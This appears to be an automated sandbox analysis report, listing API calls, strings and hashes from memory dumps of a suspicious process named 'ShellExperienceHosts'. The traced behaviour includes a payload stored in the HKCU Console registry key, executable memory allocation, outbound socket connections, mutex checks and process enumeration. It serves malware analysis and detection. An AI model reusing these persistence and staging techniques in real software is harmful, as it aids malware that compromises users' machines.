                                                                            • Instruction Fuzzy Hash: 60124A71E052148BDB14CF68C8807EEB7F6EF89318F264628E415E7781E731AD84CB95
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C6DA85C
                                                                            • SHGetFolderPathA.SHELL32 ref: 6C6DA87F
                                                                            • _strlen.LIBCMT ref: 6C6DA89D
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C6DAE64
                                                                            • CoInitialize.OLE32(00000000), ref: 6C6DAE76
                                                                            • CoCreateInstance.OLE32(6C89BA78,00000000,00000001,6C88B940,00000000), ref: 6C6DAE8D
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 6C6DAEBC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C6DAF31
                                                                            • CoUninitialize.COMBASE ref: 6C6DAF55
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                                                            • String ID:
                                                                            • API String ID: 1074249417-0
                                                                            • Opcode ID: b76d555f497792d8874c27fecbd96dd9faee8592ba4e2891daef20be107d736b
                                                                            • Instruction ID: 49c0677f9bac7a778e6721b231524915aed174b6389b33bf2cfca5a34ef30c18
                                                                            • Opcode Fuzzy Hash: b76d555f497792d8874c27fecbd96dd9faee8592ba4e2891daef20be107d736b
                                                                            • Instruction Fuzzy Hash: 055205B1D042188FDB14CF68CC847EEBBB6FF89318F154668E419A7781DB30A985CB59
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0332607C
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03326088
                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 033260B9
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0332610F
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03326116
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                             • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                            • String ID:
                                                                            • API String ID: 2526126748-0
                                                                            • Opcode ID: 7addb5e45c5aa047eff524b0ca62c15d3ce4bf72baf7c1970d4ff888f0f3aec8
                                                                            • Instruction ID: 30cca80e3b987755e6e64bdd18f3f84be98a5d62d2a99296569b9c37b679bcc8
                                                                            • Opcode Fuzzy Hash: 7addb5e45c5aa047eff524b0ca62c15d3ce4bf72baf7c1970d4ff888f0f3aec8
                                                                            • Instruction Fuzzy Hash: 3921B735A04138ABDB20EF64DCD6BFAB77DEF15710F048699ED0A97180EF75AA04C650
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Time_memmovetime
                                                                            • String ID:
                                                                            • API String ID: 1463837790-0
                                                                            • Opcode ID: b3ce1b68efdd594968f37e5840b8f8a40350a2c5fdb5e402bd68940d690b3ecf
                                                                            • Instruction ID: fc732b552cdeb74e5b40b70057049a9d5f38a062507367132c51a50f7e0008ec
                                                                            • Opcode Fuzzy Hash: b3ce1b68efdd594968f37e5840b8f8a40350a2c5fdb5e402bd68940d690b3ecf
                                                                            • Instruction Fuzzy Hash: 5451D87AB002259FD711CF69C9C0D6AFBA9FF4422471886ACE919CB704DB35F991CB90

                                                                            Control-flow Graph
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C74139C
                                                                            • GetSysColor.USER32(00000016), ref: 6C7413A5
                                                                            • GetSysColor.USER32(0000000F), ref: 6C7413B8
                                                                            • GetSysColor.USER32(00000015), ref: 6C7413CF
                                                                            • GetSysColor.USER32(0000000F), ref: 6C7413DB
                                                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 6C741403
                                                                            • GetSysColor.USER32(0000000F), ref: 6C741411
                                                                            • GetSysColor.USER32(00000010), ref: 6C74141F
                                                                            • GetSysColor.USER32(00000015), ref: 6C74142D
                                                                            • GetSysColor.USER32(00000016), ref: 6C74143B
                                                                            • GetSysColor.USER32(00000014), ref: 6C741449
                                                                            • GetSysColor.USER32(00000012), ref: 6C741457
                                                                            • GetSysColor.USER32(00000011), ref: 6C741465
                                                                            • GetSysColor.USER32(00000006), ref: 6C741470
                                                                            • GetSysColor.USER32(0000000D), ref: 6C74147B
                                                                            • GetSysColor.USER32(0000000E), ref: 6C741486
                                                                            • GetSysColor.USER32(00000005), ref: 6C741491
                                                                            • GetSysColor.USER32(00000008), ref: 6C74149F
                                                                            • GetSysColor.USER32(00000009), ref: 6C7414AA
                                                                            • GetSysColor.USER32(00000007), ref: 6C7414B5
                                                                            • GetSysColor.USER32(00000002), ref: 6C7414C0
                                                                            • GetSysColor.USER32(00000003), ref: 6C7414CB
                                                                            • GetSysColor.USER32(0000001B), ref: 6C7414D9
                                                                            • GetSysColor.USER32(0000001C), ref: 6C7414E7
                                                                            • GetSysColor.USER32(0000000A), ref: 6C7414F5
                                                                            • GetSysColor.USER32(0000000B), ref: 6C741503
                                                                            • GetSysColor.USER32(00000013), ref: 6C741511
                                                                            • GetSysColor.USER32(0000001A), ref: 6C74153A
                                                                            • GetSysColorBrush.USER32(00000010), ref: 6C74154B
                                                                            • GetSysColorBrush.USER32(00000014), ref: 6C74155E
                                                                            • GetSysColorBrush.USER32(00000005), ref: 6C741571
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C741592
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C7415B0
                                                                            • CreateSolidBrush.GDI32(00000006), ref: 6C7415CE
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C7415EF
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C74160D
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C74162B
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C741649
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C74166F
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C741693
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C7416B7
                                                                            • CreateSolidBrush.GDI32(6C6E6636), ref: 6C741735
                                                                            • CreatePatternBrush.GDI32(00000000), ref: 6C741773
                                                                              • Part of subcall function 6C6E1E5C: DeleteObject.GDI32(00000000), ref: 6C6E1E6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                                            • String ID: 6fnl
                                                                            • API String ID: 3754413814-119841961
                                                                            • Opcode ID: 5a183ebb0c3b7d4bfcb00b17f80df01c258361476bac804ce02ed614a10033b6
                                                                            • Instruction ID: bfa93cd3b5d47224f51e9a9ac71f91febf13c079c123cf05f86aba94005378aa
                                                                            • Opcode Fuzzy Hash: 5a183ebb0c3b7d4bfcb00b17f80df01c258361476bac804ce02ed614a10033b6
                                                                            • Instruction Fuzzy Hash: 51C19B70B00B02BFDF15AFB08958799BB71BB0A709F004125F229D7A81DF74A965DBE4

                                                                            Control-flow Graph
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7417BD
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 6C7417DD
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741839
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741857
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741875
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741893
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418B1
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418CF
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418ED
                                                                            • DeleteObject.GDI32(00000000), ref: 6C74190B
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741929
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741947
                                                                            • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C74197F
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 6C7419D4
                                                                            • EnumFontFamiliesW.GDI32(?,00000000,6C742460,Segoe UI), ref: 6C7419FB
                                                                            • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C741A0E
                                                                            • EnumFontFamiliesW.GDI32(?,00000000,6C742460,Tahoma), ref: 6C741A2C
                                                                            • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C741A46
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741A50
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741A98
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741AD7
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B03
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B24
                                                                            • GetSystemMetrics.USER32(00000048), ref: 6C741B43
                                                                            • lstrcpyW.KERNEL32(?,Marlett), ref: 6C741B56
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B60
                                                                            • GetStockObject.GDI32(00000011), ref: 6C741B8C
                                                                            • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C741BA7
                                                                            • lstrcpyW.KERNEL32(?,Arial), ref: 6C741BE8
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741BF2
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C0B
                                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 6C741C29
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C37
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C58
                                                                              • Part of subcall function 6C7422A5: __EH_prolog3_GS.LIBCMT ref: 6C7422AC
                                                                              • Part of subcall function 6C7422A5: GetTextMetricsW.GDI32(?,?), ref: 6C7422E1
                                                                              • Part of subcall function 6C7422A5: GetTextMetricsW.GDI32(?,?), ref: 6C742321
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
                                                                            • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                            • API String ID: 2837096512-1395034203
                                                                            • Opcode ID: 6855be27efcb44f5997d87932a5b3e986cb5a14da9080e10283b98e20349f5db
                                                                            • Instruction ID: 0c63781321b85fb4def17281bc325271f54ba31eb1bb1dc59a41cd67e3cffd5d
                                                                            • Opcode Fuzzy Hash: 6855be27efcb44f5997d87932a5b3e986cb5a14da9080e10283b98e20349f5db
                                                                            • Instruction Fuzzy Hash: 08E17F71A053499FDF21DFB0CA08BDEBBB8AF06309F00857AE459A7641DB34E949CB54

                                                                            Control-flow Graph
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                                                            • _memset.LIBCMT ref: 10005548
                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                                                            • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 10005605
                                                                            • _memset.LIBCMT ref: 10005669
                                                                            • _memset.LIBCMT ref: 1000568D
                                                                            • _memset.LIBCMT ref: 1000569F
                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                                                            • RegCloseKey.KERNEL32(?), ref: 100057CE
                                                                            • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                            • API String ID: 354323817-737951744
                                                                            • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                            • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                                                            • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                            • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329E7B
                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329EFC
                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329F24
                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329F7F
                                                                            • _malloc.LIBCMT ref: 03329FC0
                                                                              • Part of subcall function 0332F673: __FF_MSGBANNER.LIBCMT ref: 0332F68C
                                                                              • Part of subcall function 0332F673: __NMSG_WRITE.LIBCMT ref: 0332F693
                                                                              • Part of subcall function 0332F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76), ref: 0332F6B8
                                                                            • _free.LIBCMT ref: 0332A000
                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0332A028
                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0332A0B7
                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0332A112
                                                                            • _free.LIBCMT ref: 0332A134
                                                                            • _memcpy_s.LIBCMT ref: 0332A183
                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0332A1D0
                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03345A78,00022009,?,00000000,?,00000000), ref: 0332A22C
                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0332A24C
                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0332A267
                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0332A274
                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0332A27B
                                                                            • _free.LIBCMT ref: 0332A296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                            • String ID: &
                                                                            • API String ID: 640422297-3042966939
                                                                            • Opcode ID: 37a9327bf609baf9abd6531b384af721a5704ee82c82673f6d0916c56fa7f7b8
                                                                            • Instruction ID: 47ed8ac7e8745c6e6ccb0b1dc6e32e3979d83bff73c0c478a13d735ca79f8936
                                                                            • Opcode Fuzzy Hash: 37a9327bf609baf9abd6531b384af721a5704ee82c82673f6d0916c56fa7f7b8
                                                                            • Instruction Fuzzy Hash: 6BD154F5A002299FDB20DF55DCC0B9ABBB8FF48304F0485ADE609A7201DB74A995CF65

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 10002D9B
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                                                            • timeGetTime.WINMM ref: 10002DAD
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                                                            • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                                                            • htons.WS2_32(?), ref: 10002E6D
                                                                            • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                            • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
                                                                            • Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                            • Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 03322DBB
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03322DC7
                                                                            • timeGetTime.WINMM ref: 03322DCD
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 03322DFA
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03322E26
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03322E32
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03322E51
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03322E5D
                                                                            • gethostbyname.WS2_32(00000000), ref: 03322E6B
                                                                            • htons.WS2_32(?), ref: 03322E8D
                                                                            • connect.WS2_32(?,?,00000010), ref: 03322EAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: df8729ba036e718eab993d511a264ce4bdbacc73c2e0eb1f4faa1694b461180e
                                                                            • Instruction ID: 5b9a5cb629b230ceb13fc071c1473be1da0ef7662ac7fc77d81aae57509fa81e
                                                                            • Opcode Fuzzy Hash: df8729ba036e718eab993d511a264ce4bdbacc73c2e0eb1f4faa1694b461180e
                                                                            • Instruction Fuzzy Hash: 09611E75A40304AFE720EFA5DC85FABB7B8FF48B10F104519F655EB290DBB0A9048B64

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0332AD53
                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0332AD73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: OpenQueryValue
                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                            • API String ID: 4153817207-1338088003
                                                                            • Opcode ID: 47970743038d2a83dba9115b504c26ab140cbad0054892c45e6496e053d9e824
                                                                            • Instruction ID: af331a59144302936fd86e86aac4842c34819ee60acba72410b65212cccce3e5
                                                                            • Opcode Fuzzy Hash: 47970743038d2a83dba9115b504c26ab140cbad0054892c45e6496e053d9e824
                                                                            • Instruction Fuzzy Hash: FFC1C6B5A00310ABE710EF24DC85F6BBBE8BF94714F094528F945AB281EB75E905C792

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.11.26), ref: 03325F66
                                                                            • GetLastError.KERNEL32 ref: 03325F6E
                                                                            • Sleep.KERNEL32(000003E8), ref: 03325F85
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.11.26), ref: 03325F90
                                                                            • GetLastError.KERNEL32 ref: 03325F92
                                                                            • _memset.LIBCMT ref: 03325FB9
                                                                            • lstrlenW.KERNEL32(?), ref: 03325FC6
                                                                            • lstrcmpW.KERNEL32(?,03345328), ref: 03325FED
                                                                            • Sleep.KERNEL32(000003E8), ref: 03325FF8
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 03326005
                                                                            • GetConsoleWindow.KERNEL32 ref: 0332600F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                            • String ID: 2024.11.26$key$open
                                                                            • API String ID: 2922109467-1532587582
                                                                            • Opcode ID: ce1081a3a1aa6d2f2b8c94a4310084f0080d0295f0ba34c800b6b9de2108afbb
                                                                            • Instruction ID: b540e7721a60797ead607fc734e8579cf06055cb32ee8cd4d1f4a05ec5631291
                                                                            • Opcode Fuzzy Hash: ce1081a3a1aa6d2f2b8c94a4310084f0080d0295f0ba34c800b6b9de2108afbb
                                                                            • Instruction Fuzzy Hash: EB21E476904315ABE610EB60ECC6B1AB79CAF84700F144819F604971D1EBB4F605CBA3
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 033262CE
                                                                            • wsprintfW.USER32 ref: 03326336
                                                                            • RegOpenKeyExW.KERNELBASE(80000000,?,00000000,00020019,?), ref: 0332635F
                                                                            • _memset.LIBCMT ref: 03326376
                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 033263B2
                                                                            • lstrcatW.KERNEL32(03351F10,?), ref: 033263CE
                                                                            • lstrcatW.KERNEL32(03351F10,0334535C), ref: 033263DA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 033263E3
                                                                            • lstrlenW.KERNEL32(03351F10,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 03326427
                                                                            • lstrcatW.KERNEL32(03351F10,033453D4,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 0332643B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
